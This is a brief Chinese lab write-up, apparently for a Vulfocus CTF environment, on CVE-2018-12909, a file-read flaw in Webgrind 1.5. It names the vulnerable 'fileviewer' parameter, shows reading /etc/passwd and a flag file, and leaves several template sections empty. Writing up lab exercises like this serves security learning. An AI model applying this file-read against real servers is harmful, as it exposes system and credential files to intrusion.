1.1漏洞描述
| 漏洞编号 | CVE-2018-12909 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐⭐⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 |
1.2漏洞等级
高危
1.3影响版本
Webgrind 1.5版本
1.4漏洞复现
1.4.1.基础环境
1.4.2.前提
-
网站后台地址:
-
后台管理账密:
-
后台登录地址
1.5深度利用
1.5.1 漏洞点
index.php?op=fileviewer&file= URI
查看/etc/passwd
查看/tmp/flag
拿到flag
flag-{bmhc6490ded-c53b-4b1a-aa24-687949eb1c11}
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
